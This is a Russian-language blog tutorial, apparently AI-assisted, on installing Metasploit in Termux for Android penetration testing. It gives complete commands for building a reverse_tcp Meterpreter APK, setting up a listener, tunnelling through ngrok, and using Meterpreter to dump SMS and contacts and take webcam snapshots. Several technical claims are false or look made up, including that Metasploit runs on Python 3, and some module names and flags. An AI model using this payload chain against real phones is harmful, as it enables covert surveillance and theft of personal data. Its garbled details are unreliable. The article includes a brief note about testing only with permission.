We detected you are likely not from a Russian-speaking region. Would you like to switch to the international version of the site?

  Назад к списку статей

Интеграция Metasploit Framework в Termux для мобильных penetration‑тестов

Мобильные устройства становятся всё более привлекательной целью для злоумышленников. Metasploit Framework – один из самых мощных наборов инструментов для проведения penetration‑тестов, а Termux позволяет запускать полноценную Linux‑среду прямо на Android‑смартфоне. В этой статье мы подробно разберём, как интегрировать Metasploit в Termux и использовать его для мобильных тестов безопасности.

Что понадобится

  • Устройство Android с установленным Termux (рекомендовано Android 8.0+).
  • Подключение к Интернету для загрузки пакетов.
  • Базовые навыки работы в терминале Linux.
  • Для полного опыта – доступ к root (не обязателен, но упрощает настройку некоторых модулей).

Подготовка Termux

Сначала обновим репозитории и установим необходимые утилиты.

pkg update && pkg upgrade -y
pkg install -y git wget curl proot-distro python python-dev clang make openssl-tool libffi-dev libsqlite3-dev libcrypt-dev ncurses-utils

Установим python версии 3, так как Metasploit работает именно с ней. Далее настроим окружение для сборки native‑модулей.

Установка Metasploit Framework

Самый простой способ – использовать готовый скрипт от Rapid7. В Termux он запускается так:

curl -LO https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfvenom
chmod +x msfvenom

Однако предпочтительнее установить полную копию через официальную репозиторию.

# Добавляем репозиторий Metasploit
pkg install -y metasploit
# Инициализируем базу данных
msfdb init

Если пакет metasploit недоступен в официальных репозиториях, используем альтернативный скрипт Metasploit_termux:

git clone https://github.com/Hax4us/Metasploit_termux.git
cd Metasploit_termux
./install.sh

Скрипт автоматически установит все зависимости и соберёт Metasploit под текущую архитектуру.

Первый запуск msfconsole

После установки проверим работу консоли:

msfconsole -q -x "version"

Если всё прошло успешно, вы увидите текущую версию Metasploit и приглашение msf6>. Теперь можно приступать к генерации payload‑ов.

Генерация Android‑payload с помощью msfvenom

Для мобильных тестов часто используют android/meterpreter/reverse_tcp. Пример команды:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -a dalvik -o /sdcard/payload.apk

Параметры:

  • LHOST – IP‑адрес вашего слушателя (обычно IP в той же сети).
  • LPORT – порт, на котором будет ждать соединения.
  • -a dalvik – указывает архитектуру Android.
  • -o – путь к полученному APK‑файлу.

Установите полученный payload.apk на целевое устройство (для тестов используйте собственный телефон или эмулятор).

Настройка слушателя (listener)

Запустим msfconsole и создадим мульти‑handler:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
run

После запуска слушателя откройте payload.apk на целевом устройстве. При выполнении вы увидите сессию Meterpreter в терминале.

Базовые команды Meterpreter на Android

  • sysinfo – информация о системе.
  • dump_sms – выгрузка SMS‑сообщений.
  • dump_contacts – список контактов.
  • webcam_snap – снимок с камеры (при наличии разрешений).
  • shell – доступ к обычному shell‑у.

Эти команды позволяют быстро оценить уровень защиты устройства.

Сканирование уязвимостей Android‑устройств

Metasploit содержит набор вспомогательных модулей, полезных для предварительного аудита.

use auxiliary/scanner/android/adb_version
set RHOSTS 192.168.1.0/24
run

Модуль проверит, какие устройства в сети отвечают на ADB‑подключения. Другие полезные сканеры:

  • auxiliary/scanner/http/android_debug_bridge – поиск открытых ADB‑портов.
  • auxiliary/scanner/http/android_app_info – извлечение информации из APK‑файлов.

Лучшие практики и меры предосторожности

  • Всегда проводите тесты только на устройствах, на которые есть явное разрешение.
  • Отключайте root доступ, если он не нужен, чтобы избежать случайных изменений системы.
  • Регулярно обновляйте репозитории Termux (pkg update && pkg upgrade) и Metasploit (git pull в каталоге установки).
  • Используйте VPN или отдельную подсеть для изоляции тестовой среды.

Устранение распространённых проблем

ПроблемаПричинаРешение
Ошибка Failed to load OpenSSLОтсутствие библиотеки opensslУстановите её: pkg install openssl-tool
Метод android/meterpreter/reverse_tcp не работаетБлокировка портов в сетиОткройте нужный порт в роутере или используйте ngrok для туннелирования.
msfconsole падает с Segmentation faultНесовместимость архитектуры (ARM vs x86)Пересоберите Metasploit через скрипт install.sh с параметром --arch arm64.

Заключение

Интеграция Metasploit Framework в Termux открывает широкие возможности для проведения мобильных penetration‑тестов прямо на вашем Android‑устройстве. Мы рассмотрели процесс установки, генерацию Android‑payload, настройку слушателя и базовые команды Meterpreter, а также полезные сканеры и рекомендации по безопасности. Освоив эти инструменты, вы сможете эффективно оценивать защищённость мобильных приложений и устройств.

Если вам требуется профессиональная помощь в проведении мобильных аудитов, разработке кастомных эксплойтов или обучении персонала, обратитесь к RybinskLab. Мы предоставляем услуги по тестированию безопасности, настройке инфраструктуры и обучению сотрудников современным методикам киберзащиты.

* Текст статьи подготовлен и структурирован с использованием технологий искусственного интеллекта. Проверен экспертом RybinskLab.

Поделиться знанием:

Нужна профессиональная помощь?

Меня зовут Усачёв Денис Евгеньевич. Я оказываю IT-услуги в Рыбинске и Ярославской области: настройка серверов, безопасность, автоматизация бизнеса.

Связаться со мной
Поддержать проект